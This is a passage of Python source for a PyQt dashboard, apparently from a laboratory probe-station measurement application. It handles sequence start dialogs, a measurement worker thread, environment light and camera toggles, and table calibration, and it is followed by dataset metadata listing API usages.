QtWidgets.QMessageBox.question(self, \"Run Measurement\", message)\n if result == QtWidgets.QMessageBox.Yes:\n self._on_start(item)\n\n def startContact(self, item: ContactTreeItem) -> None:\n dialog = StartSequenceDialog(self)\n dialog.setMessage(f\"Are you sure you want to start sequence {item.name()!r}? \")\n dialog.setTableEnabled(self.isTableEnabled())\n # TODO\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n dialog.readSettings()\n if dialog.exec() == dialog.Accepted:\n dialog.writeSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n self._on_start(\n item,\n move_to_contact=dialog.isMoveToContact(),\n move_to_after_position=dialog.isMoveToPosition()\n )\n\n def startSample(self, item: SampleTreeItem) -> None:\n dialog = StartSequenceDialog(self)\n dialog.setMessage(f\"Are you sure you want to start all enabled sequences for {item.name()!r}? 
\")\n dialog.setTableEnabled(self.isTableEnabled())\n # TODO\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n dialog.readSettings()\n if dialog.exec() == dialog.Accepted:\n dialog.writeSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n self._on_start(\n item,\n move_to_contact=dialog.isMoveToContact(),\n move_to_after_position=dialog.isMoveToPosition()\n )\n\n def on_start(self) -> None:\n # Store settings\n self.writeSettings()\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n self.startMeasurement(item)\n elif isinstance(item, ContactTreeItem):\n self.startContact(item)\n elif isinstance(item, SampleTreeItem):\n self.startSample(item)\n elif isinstance(item, GroupTreeItem):\n self.startSample(item)\n\n def _on_start(self, item, move_to_contact=False, move_to_after_position=None):\n self.started.emit()\n # Create output directory\n self.panels.store()\n self.panels.unmount()\n self.panels.clear()\n self.create_output_dir()\n self.switch_off_lights()\n self.sync_environment_controls()\n\n config = {\n \"table_position\": self.table_position(), # TODO state\n \"table_contact_delay\": settings.table_contact_delay,\n \"retry_contact_radius\": settings.retry_contact_radius,\n \"retry_contact_distance\": settings.retry_contact_distance,\n \"retry_contact_overdrive\": settings.retry_contact_overdrive,\n \"retry_contact_count\": settings.retry_contact_count,\n \"retry_measurement_count\": settings.retry_measurement_count,\n \"write_logfiles\": self.write_logfiles(),\n \"serialize_json\": settings.export_json,\n \"serialize_txt\": settings.export_txt,\n \"use_environ\": self.isEnvironmentEnabled(),\n \"use_table\": self.isTableEnabled(),\n \"move_to_contact\": move_to_contact,\n \"move_to_after_position\": move_to_after_position,\n \"operator\": self.currentOperator(),\n \"output_dir\": self.outputDir(),\n }\n\n worker = MeasureWorker(self.station, config, item)\n worker.failed.connect(lambda exc: self.failed.emit(exc, None))\n worker.finished.connect(self.on_finished)\n worker.finished.connect(self.sequenceFinished)\n worker.message_changed.connect(self.messageChanged.emit)\n worker.progress_changed.connect(self.progressChanged.emit)\n worker.item_state_changed.connect(self.setItemState)\n worker.item_reset.connect(self.resetItem)\n worker.item_visible.connect(self.showItem)\n worker.item_hidden.connect(self.hideItem)\n worker.save_to_image.connect(self.safeToImage)\n worker.measurement_finished.connect(self.measurementFinished)\n worker.reading_appended.connect(self.appendReading)\n worker.readings_updated.connect(self.updateReadings)\n worker.analysis_appended.connect(self.appendAnalysis)\n worker.state_changed.connect(self.updateState)\n self.aborting.connect(worker.abort)\n\n self.measure_thread = threading.Thread(target=worker)\n self.measure_thread.start()\n\n def appendReading(self, name, x, y):\n if self._panel:\n self._panel.appendReading(name, x, y)\n\n def updateReadings(self):\n if self._panel:\n self._panel.updateReadings()\n\n def appendAnalysis(self, key, value):\n if self._panel:\n self._panel.appendAnalysis(key, value)\n\n def updateState(self, *args):\n if self._panel:\n self._panel.updateState(*args)\n\n def setItemState(self, item, state) -> None:\n item.setState(state)\n item.setExpanded(True)\n self.sequenceTreeWidget.resizeColumns()\n\n def resetItem(self, item) -> None:\n item.reset()\n self.sequenceTreeWidget.resizeColumns()\n\n def showItem(self, item) -> None:\n 
item.setSelectable(True)\n item.series.clear()\n item.setForeground(0, QtGui.QBrush(QtGui.QColor(\"blue\")))\n self.sequenceTreeWidget.scrollToItem(item)\n self.panels.unmount()\n self.panels.hide()\n self.panels.clear()\n panel = self.panels.get(item.item_type)\n panel.setVisible(True)\n panel.mount(item)\n self._panel = panel\n\n def hideItem(self, item) -> None:\n item.setSelectable(False)\n item.setForeground(0, QtGui.QBrush())\n\n def saveToImage(self, item, filename) -> None:\n plot_png = settings.settings.get(\"png_plots\") or False\n panel = self.panels.get(item.item_type)\n if panel and plot_png:\n panel.saveToImage(filename)\n\n def on_stop(self):\n self.sequenceControlWidget.stop()\n self.aborting.emit()\n\n def on_finished(self):\n self.sync_environment_controls()\n self.finished.emit()\n self.measure_thread = None\n\n def on_reset_sequence_state(self):\n result = QtWidgets.QMessageBox.question(self, \"Reset State\", \"Do you want to reset all sequence states?\")\n if result == QtWidgets.QMessageBox.Yes:\n current_item = self.sequenceTreeWidget.currentItem()\n self._panel = None\n self.panels.unmount()\n self.panels.clear()\n self.panels.hide()\n for sample_item in self.sequenceTreeWidget.sampleItemsOnly():\n sample_item.reset()\n if current_item is not None:\n panel = self.panels.get(current_item.item_type)\n panel.setVisible(True)\n panel.mount(current_item)\n\n def on_edit_sequence(self):\n sequences = load_all_sequences(settings)\n dialog = EditSamplesDialog(self.sequenceTreeWidget.sampleItemsOnly(), sequences)\n dialog.run()\n self.on_tree_selected(self.sequenceTreeWidget.currentItem(), None)\n\n # Measurement control\n\n def restoreDefaults(self) -> None:\n result = QtWidgets.QMessageBox.question(self, \"Restore Defaults\", \"Do you want to restore the default parameters?\")\n if result == QtWidgets.QMessageBox.Yes:\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n panel = self.panels.get(item.item_type)\n panel.restore()\n\n # Table calibration\n\n def on_table_joystick_toggled(self, state: bool) -> None:\n self.table_worker.enable_joystick(state)\n\n def on_table_joystick_changed(self, state):\n self.tableControlWidget.setJoystickEnabled(state)\n\n def on_table_position_changed(self, position):\n self.tableControlWidget.setPosition(position)\n\n def on_table_calibration_changed(self, position):\n self.tableControlWidget.setCalibration(position)\n panel = self.panels.get(\"contact\")\n if panel:\n enabled = self.isTableEnabled() and self.tableControlWidget.isCalibrationValid()\n panel.setTableEnabled(enabled)\n\n def on_table_control_clicked(self) -> None:\n self.table_worker.enable_joystick(False)\n dialog = AlignmentDialog(self.table_worker, self.contact_quality_process)\n dialog.readSettings()\n dialog.loadSequence(self.sequenceTreeWidget.sequenceItems())\n if self.isEnvironmentEnabled():\n # TODO !!!\n with self.environ_worker as environ_worker:\n pc_data = environ_worker.pc_data()\n dialog.updateSafety(pc_data.relay_states.laser_sensor)\n dialog.update_probecard_light(pc_data.relay_states.probecard_light)\n dialog.update_microscope_light(pc_data.relay_states.microscope_light)\n dialog.update_box_light(pc_data.relay_states.box_light)\n dialog.update_lights_enabled(True)\n dialog.probecardLightToggled.connect(self.on_probecard_light_toggled)\n dialog.microscopeLightToggled.connect(self.on_microscope_light_toggled)\n dialog.boxLightToggled.connect(self.on_box_light_toggled)\n dialog.exec()\n 
self.contact_quality_process.stop()\n self.contact_quality_process.join()\n dialog.writeSettings()\n dialog.updateSamples()\n # Prevent glitch\n current_item = self.sequenceTreeWidget.currentItem()\n if isinstance(current_item, ContactTreeItem):\n panel = self.panels.get(\"contact\")\n panel.mount(current_item)\n # Restore events...\n self.table_worker.joystick_changed = self.on_table_joystick_changed\n self.table_worker.position_changed = self.on_table_position_changed\n self.table_worker.caldone_changed = self.on_table_calibration_changed\n self.syncTableControls()\n # Store settings\n self.writeSettings()\n\n def on_laser_sensor_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_laser_sensor(state)\n\n def on_box_light_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_box_light(state)\n\n def on_microscope_light_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_microscope_light(state)\n\n def on_microscope_camera_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_microscope_camera(state)\n\n def on_microscope_control_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_microscope_control(state)\n\n def on_probecard_light_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_probecard_light(state)\n\n def on_probecard_camera_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_probecard_camera(state)\n\n def on_pid_control_toggled(self, state):\n with self.environ_worker as environ_worker:\n environ_worker.set_pid_control(state)\n\n def switch_off_lights(self):\n if self.isEnvironmentEnabled():\n with self.environ_worker as environ_worker:\n if environ_worker.has_lights():\n environ_worker.dim_lights()\n\n def sync_environment_controls(self):\n \"\"\"Synchronize environment controls.\"\"\"\n if self.isEnvironmentEnabled():\n with self.environ_worker as environ_worker:\n environ_worker.request_pc_data()\n\n else:\n self.environmentWidget.setEnabled(False)\n\n def setPCData(self, pc_data):\n self.environmentControlWidget.updateLaserSensorState(pc_data.relay_states.laser_sensor)\n self.environmentControlWidget.updateBoxLightState(pc_data.relay_states.box_light)\n self.environmentControlWidget.updateMicroscopeLightState(pc_data.relay_states.microscope_light)\n self.environmentControlWidget.updateMicroscopeCameraState(pc_data.relay_states.microscope_camera)\n self.environmentControlWidget.updateMicroscopeControlState(pc_data.relay_states.microscope_control)\n self.environmentControlWidget.updateProbecardLightState(pc_data.relay_states.probecard_light)\n self.environmentControlWidget.updateProbecardCameraState(pc_data.relay_states.probecard_camera)\n self.environmentControlWidget.updatePidControlState(pc_data.pid_status)\n self.environmentWidget.setEnabled(True)\n t = time.time()\n # Note: occasional crashes due to `NaN` timestamp.\n if not math.isfinite(t):\n logger.error(\"invalid timestamp: %s\", t)\n t = 0\n self.environmentWidget.appendData(t, pc_data)\n\n def syncTableControls(self):\n \"\"\"Synchronize table controls.\"\"\"\n enabled = self.isTableEnabled()\n self.table_worker.enabled = enabled\n self.on_table_position_changed(Position())\n self.on_table_calibration_changed(Position())\n if enabled:\n self.table_worker.status()\n\n def on_environment_groupbox_toggled(self, state):\n if state:\n self.environ_worker.start()\n 
self.sync_environment_controls()\n else:\n self.environ_worker.stop()\n\n def on_table_groupbox_toggled(self, state: bool) -> None:\n if state:\n self.table_worker.start()\n self.table_worker.enable_joystick(False)\n else:\n self.table_worker.stop()\n self.syncTableControls()\n\n def measurementFinished(self, data: dict) -> None:\n self.plugins.handle(\"measurement_finished\", data=data)\n\n def sequenceFinished(self) -> None:\n data = {} # TODO\n self.plugins.handle(\"sequence_finished\", data=data)\n\n def shutdown(self):\n if self.measure_thread:\n self.on_stop()\n self.measure_thread.join()\n", "repo_name": "hephy-dd/comet-pqc", "sub_path": "pqc/view/dashboard.py", "file_name": "dashboard.py", "file_ext": "py", "file_size_in_byte": 42092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 45, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 47, "usage_type": "name"}, {"api_name": "sequence.SequenceTreeWidget", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 59, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 75, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 79, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QToolButton", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 84, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 95, "usage_type": "name"}, {"api_name": "settings.settings.settings.get", "line_number": 100, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 100, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "sequence.GroupTreeItem", "line_number": 104, "usage_type": "call"}, {"api_name": 
"sequence.SampleTreeItem", "line_number": 106, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 119, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 119, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 136, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 136, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 136, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 137, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 137, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QProgressDialog", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 138, "usage_type": "name"}, {"api_name": "core.config.load_sequence", "line_number": 149, "usage_type": "call"}, {"api_name": "core.config", "line_number": 149, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 154, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 154, "usage_type": "name"}, {"api_name": "sequence.SampleTreeItem", "line_number": 160, "usage_type": "name"}, {"api_name": "sequence.ContactTreeItem", "line_number": 160, "usage_type": "name"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 160, "usage_type": "name"}, {"api_name": "sequence.SampleTreeItem", "line_number": 168, "usage_type": "call"}, {"api_name": "sequence.GroupTreeItem", "line_number": 176, "usage_type": "call"}, {"api_name": "sequence.SampleTreeItem", "line_number": 185, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 186, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 186, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 187, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 187, "usage_type": "name"}, {"api_name": "sequence.GroupTreeItem", "line_number": 189, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 190, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 190, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 190, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 191, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 191, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 204, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 206, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 206, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 207, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 209, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 209, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 209, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 214, "usage_type": "name"}, {"api_name": "components.PositionWidget", "line_number": 219, 
"usage_type": "call"}, {"api_name": "components.CalibrationWidget", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 223, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 223, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 224, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 224, "usage_type": "name"}, {"api_name": "core.utils.make_path", "line_number": 224, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 231, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 231, "usage_type": "name"}, {"api_name": "core.position.Position", "line_number": 248, "usage_type": "name"}, {"api_name": "core.position.Position", "line_number": 254, "usage_type": "name"}, {"api_name": "utils.caldone_valid", "line_number": 256, "usage_type": "call"}, {"api_name": "settings.settings.settings.get", "line_number": 259, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 259, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 259, "usage_type": "name"}, {"api_name": "settings.settings.table_joystick_maximum_limits", "line_number": 261, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 261, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 264, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 264, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 266, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 266, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 266, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 271, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 275, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 279, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 283, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 287, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 291, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 295, "usage_type": "name"}, {"api_name": "components.ToggleButton", "line_number": 299, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 303, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 303, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 338, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 338, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QVariantAnimation", "line_number": 342, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 342, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 343, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 343, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 344, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 344, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 345, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 345, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 353, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 353, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", 
"line_number": 358, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 358, "usage_type": "name"}, {"api_name": "comet.process.ProcessMixin", "line_number": 358, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 362, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 362, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 363, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 363, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 364, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 364, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 365, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 365, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 366, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 366, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 367, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 367, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 369, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 369, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 369, "usage_type": "name"}, {"api_name": "components.OperatorWidget", "line_number": 411, "usage_type": "call"}, {"api_name": "components.WorkingDirectoryWidget", "line_number": 415, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 420, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 420, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 422, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 422, "usage_type": "name"}, {"api_name": "measurementwidget.MeasurementWidget", "line_number": 435, "usage_type": "call"}, {"api_name": "environmentwidget.EnvironmentWidget", "line_number": 438, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 446, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 446, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QSplitter", "line_number": 452, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 452, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 459, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 459, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 463, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 463, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 465, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 465, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSettings", "line_number": 484, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 484, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QByteArray", "line_number": 486, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 486, "usage_type": "name"}, {"api_name": "settings.settings.settings.get", "line_number": 490, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 490, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 490, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSettings", "line_number": 497, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", 
"line_number": 497, "usage_type": "name"}, {"api_name": "settings.settings.settings", "line_number": 503, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 503, "usage_type": "name"}, {"api_name": "settings.settings.settings", "line_number": 504, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 504, "usage_type": "name"}, {"api_name": "sequence.SampleTreeItem", "line_number": 518, "usage_type": "name"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 524, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 526, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 528, "usage_type": "argument"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 535, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 537, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 539, "usage_type": "argument"}, {"api_name": "core.position.Position", "line_number": 549, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 565, "usage_type": "call"}, {"api_name": "os.path", "line_number": 565, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 572, "usage_type": "call"}, {"api_name": "os.path", "line_number": 572, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 573, "usage_type": "call"}, {"api_name": "settings.settings.settings.get", "line_number": 577, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 577, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 577, "usage_type": "name"}, {"api_name": "sequence.GroupTreeItem", "line_number": 608, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 612, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 616, "usage_type": "argument"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 620, "usage_type": "argument"}, {"api_name": "alignment.safe_z_position", "line_number": 648, "usage_type": "call"}, {"api_name": "sequence.GroupTreeItem", "line_number": 657, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 661, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 665, "usage_type": "argument"}, {"api_name": "sequence.SequenceRootTreeItem", "line_number": 672, "usage_type": "call"}, {"api_name": "sequence.StartSequenceDialog", "line_number": 673, "usage_type": "call"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 689, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 692, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 692, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 692, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 693, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 693, "usage_type": "name"}, {"api_name": "sequence.ContactTreeItem", "line_number": 696, "usage_type": "name"}, {"api_name": "sequence.StartSequenceDialog", "line_number": 697, "usage_type": "call"}, {"api_name": "sequence.SampleTreeItem", "line_number": 714, "usage_type": "name"}, {"api_name": "sequence.StartSequenceDialog", "line_number": 715, "usage_type": "call"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 736, "usage_type": "argument"}, {"api_name": 
"sequence.ContactTreeItem", "line_number": 738, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 740, "usage_type": "argument"}, {"api_name": "sequence.GroupTreeItem", "line_number": 742, "usage_type": "argument"}, {"api_name": "core.config", "line_number": 755, "usage_type": "name"}, {"api_name": "settings.settings.table_contact_delay", "line_number": 757, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 757, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_radius", "line_number": 758, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 758, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_distance", "line_number": 759, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 759, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_overdrive", "line_number": 760, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 760, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_count", "line_number": 761, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 761, "usage_type": "name"}, {"api_name": "settings.settings.retry_measurement_count", "line_number": 762, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 762, "usage_type": "name"}, {"api_name": "settings.settings.export_json", "line_number": 764, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 764, "usage_type": "name"}, {"api_name": "settings.settings.export_txt", "line_number": 765, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 765, "usage_type": "name"}, {"api_name": "workers.measure.MeasureWorker", "line_number": 774, "usage_type": "call"}, {"api_name": "core.config", "line_number": 774, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 792, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 823, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 823, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 823, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 835, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 835, "usage_type": "name"}, {"api_name": "settings.settings.settings.get", "line_number": 838, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 838, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 838, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 853, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 853, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 853, "usage_type": "name"}, {"api_name": 